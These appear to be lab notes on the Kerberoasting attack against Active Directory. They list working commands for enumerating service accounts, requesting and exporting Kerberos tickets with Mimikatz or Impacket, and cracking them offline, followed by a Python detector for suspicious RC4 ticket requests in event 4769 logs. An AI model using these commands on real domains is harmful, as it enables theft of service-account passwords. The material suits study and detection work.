Kerberoast Attack Example

Find User Accounts

Get-NetUser -SPN

Request Ticket For Service

Add-Type -AssemblyName System.IdentityModel

New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local"
klist

Dump Ticket

Invoke-Mimikatz -Command '"kerberos::list /export"'

Request from Kali

python3 /usr/share/doc/python3-impacket/examples/GetUserSPNs.py -request dc04.tricky.com/sqlsvc

Crack Password

python.exe .\tgsrepcrack.py .\10k-worst-pass.txt .\1-40a10000-student648@MSSQLSvc~dcorp-mgmt.dollarcorp.moneycorp.local-DOLLARCORP.MONEYCORP.LOCAL.kirbi
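
Detection

Each service ticket request shown above is logged on the domain controller as Security event 4769 when Kerberos service ticket auditing is enabled. The following is an added example, not part of the original notes: it flags accounts that obtain RC4 (0x17) tickets for several user-owned services. The field names follow the 4769 event schema; the CSV export layout, the sample rows, the account names and the threshold are assumptions constructed for illustration.

```python
import csv
import io
from collections import defaultdict

# Constructed sample of exported Security events (Event ID 4769); not real logs.
SAMPLE = """\
TimeCreated,EventID,TargetUserName,ServiceName,TicketEncryptionType,Status,IpAddress
2024-01-10T09:00:01,4769,alice@CORP.EXAMPLE,FILESRV01$,0x12,0x0,10.0.0.21
2024-01-10T09:02:13,4769,student1@CORP.EXAMPLE,sqlsvc,0x17,0x0,10.0.0.50
2024-01-10T09:02:14,4769,student1@CORP.EXAMPLE,websvc,0x17,0x0,10.0.0.50
2024-01-10T09:02:15,4769,student1@CORP.EXAMPLE,backupsvc,0x17,0x0,10.0.0.50
2024-01-10T09:05:40,4769,bob@CORP.EXAMPLE,sqlsvc,0x12,0x0,10.0.0.33
2024-01-10T09:06:02,4769,WKSTN7$@CORP.EXAMPLE,krbtgt,0x17,0x0,10.0.0.77
2024-01-10T09:07:30,4769,carol@CORP.EXAMPLE,legacyapp,0x17,0x0,10.0.0.41
"""

RC4_HMAC = 0x17  # etype 23; AES tickets use 0x11 / 0x12


def is_suspect(ev):
    """Successful RC4 service ticket for a user-owned (non-machine) service."""
    svc = ev["ServiceName"].lower()
    requester = ev["TargetUserName"].split("@")[0]
    return (
        ev["EventID"] == "4769"
        and ev["Status"].lower() == "0x0"
        and int(ev["TicketEncryptionType"], 16) == RC4_HMAC
        and not svc.endswith("$")        # skip computer-account services
        and svc != "krbtgt"
        and not requester.endswith("$")  # skip machine-account requesters
    )


def find_kerberoast_candidates(log_text, min_services=2):
    """Return {requester: sorted services} for accounts at or over the threshold."""
    seen = defaultdict(set)
    for ev in csv.DictReader(io.StringIO(log_text)):
        if is_suspect(ev):
            seen[ev["TargetUserName"]].add(ev["ServiceName"])
    return {u: sorted(s) for u, s in seen.items() if len(s) >= min_services}


if __name__ == "__main__":
    for user, services in find_kerberoast_candidates(SAMPLE).items():
        print(f"{user}: RC4 tickets requested for {services}")
```

With `min_services=1` the single request by carol is also reported, which is how a legacy application that still relies on RC4 shows up and needs to be baselined.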

Resources

Deep Dive into Kerberoasting Attack